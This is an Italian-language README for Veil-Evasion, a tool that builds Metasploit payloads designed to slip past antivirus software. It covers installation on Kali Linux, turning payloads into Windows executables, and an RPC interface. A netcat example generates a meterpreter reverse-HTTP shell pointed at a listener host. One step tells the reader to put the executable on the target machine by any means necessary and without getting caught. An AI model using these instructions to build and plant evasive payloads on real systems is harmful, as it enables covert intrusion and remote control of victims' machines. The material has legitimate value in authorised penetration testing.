
Veil Evasion non è più supportato, usa Veil 3.0!
Veil-Evasion è uno strumento progettato per generare payload metasploit che bypassano le comuni soluzioni antivirus.
NOTA:
./setup/setup.shdovrebbe essere rieseguito ad ogni aggiornamento di versione principale. Se ricevi errori gravi durante l'esecuzione di Veil-Evasion, prova prima a rieseguire questo script per installare eventuali pacchetti aggiuntivi e aggiornare il file di configurazione comune.
Veil-Evasion è attualmente supportato attivamente da @ChrisTruncer, @TheMightyShiv, @HarmJ0y.
Ringraziamenti a:
oppure
NOTA: L'installazione deve essere eseguita con privilegi di superutente. Se non stai usando Kali Linux, anteponi a ogni comando
sudoo passa all'utente root prima di iniziare.
Esegui setup.sh -c su Kali x86.
Installa Python 2.7, Py2Exe, PyCrypto e PyWin32 su un computer Windows (per Py2Exe).
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
NOTA: Questo deve essere fatto con privilegi di superutente. Se non stai usando Kali Linux, anteponi a ogni comando
sudoo passa all'utente root prima di iniziare.
La maggior parte delle volte il file di configurazione in /etc/veil/settings.py non necessita di essere ricostruito, ma in alcuni casi potresti essere invitato a farlo. Il file è generato da config/update.py.
È importante che tu sia nella directory config/ prima di eseguire update.py. Se non lo sei, settings.py sarà errato e quando avvierai Veil-Evasion vedrai quanto segue.
Main Menu
0 payloads loaded
Niente panico. Entra nella directory config/ e riesegui update.py.
Veil-Evasion è stato progettato per funzionare su Kali Linux, ma dovrebbe funzionare su qualsiasi sistema in grado di eseguire script Python. Basta invocare Veil-Evasion dalla riga di comando e seguire il menu per generare un payload. Una volta creato il payload, Veil-Evasion chiederà se si desidera convertire il file del payload in un eseguibile tramite Pyinstaller o Py2Exe.
Se si utilizza Pyinstaller, Veil-Evasion convertirà il tuo payload in un eseguibile all'interno di Kali.
Se si utilizza Py2Exe, Veil-Evasion creerà tre file:
Sposta tutti e tre i file sulla tua macchina Windows con Python installato. Tutti e tre i file devono essere posizionati nella radice della directory in cui è stato installato Python (probabilmente C:\Python27). Esegui lo script batch per convertire lo script Python in un formato eseguibile.
Posiziona il file eseguibile sulla macchina target con qualsiasi mezzo necessario e non farti scoprire!
Sul lato listener, esegui:
./Veil-Evasion --rpc
Questo avvierà un listener sulla porta 4242.
Sul lato client, dovrai eseguire un programma client. Può essere uno script personalizzato o semplice come Netcat. Il server RPC implementa JSON-RPC. Questo è un buon riferimento per interpretare richieste e risposte per JSON-RPC: http://json-rpc.org/wiki/specification
Il formato della richiesta RPC è il seguente:
method="version" - restituisce il numero di versione corrente di Veil-Evasion
method="payloads" - restituisce tutti i payload attualmente caricati
method="payload_options"
params="payload_name" - restituisce le opzioni per il payload specificato
method="generate"
params=["payload=X",
"outputbase=Y"
"overwrite=Z",
"msfvenom=...",
"LHOST=blah] - genera il payload specificato con le opzioni fornite e restituisce il percorso dell'eseguibile generato
Questo è un semplice esempio di utilizzo di Veil-Evasion con Netcat:
root@kali:~# nc 127.0.0.1 4242
{"method":"version","params":[],"id":0}
E la risposta del server:
{"id":0,"result":"2.21.4","error":null}
Un esempio di programma client può essere trovato qui: http://github.com/miligulmohar/python-symmetric-jsonrpc/blob/master/examples/client.py
NOTA: La porta per Veil-Evasion è 4242. Questa deve essere modificata in client.py per funzionare.
Per generare un payload, TUTTI i parametri devono essere inclusi:
Questa è un buon riferimento per capire se utilizzare o meno pwnstaller: http://www.verisgroup.com/blog/2014/05/07/pwnstaller-and-the-veil-framework/
Un esempio di generazione di un payload:
root@kali:~# nc 127.0.0.1 4242
{"method":"generate","params":["payload=c/meterpreter/rev_http","outputbase=payloadName","LHOST=192.168.1.11","LPORT=2121","pwnstaller=False"],"id":1"}
E la risposta del server:
{"id":8,"result":"/usr/share/veil-output/compiled/payloadName.exe","error":null}
NOTA: Se non viene specificato alcun id nella richiesta, Veil-Evasion si spegnerà. Detto questo, puoi effettuare tutte le richieste valide che desideri fino a quando Veil-Evasion si spegne.
Per spegnere il server RPC esegui:
./Veil-Evasion --rpcshutdown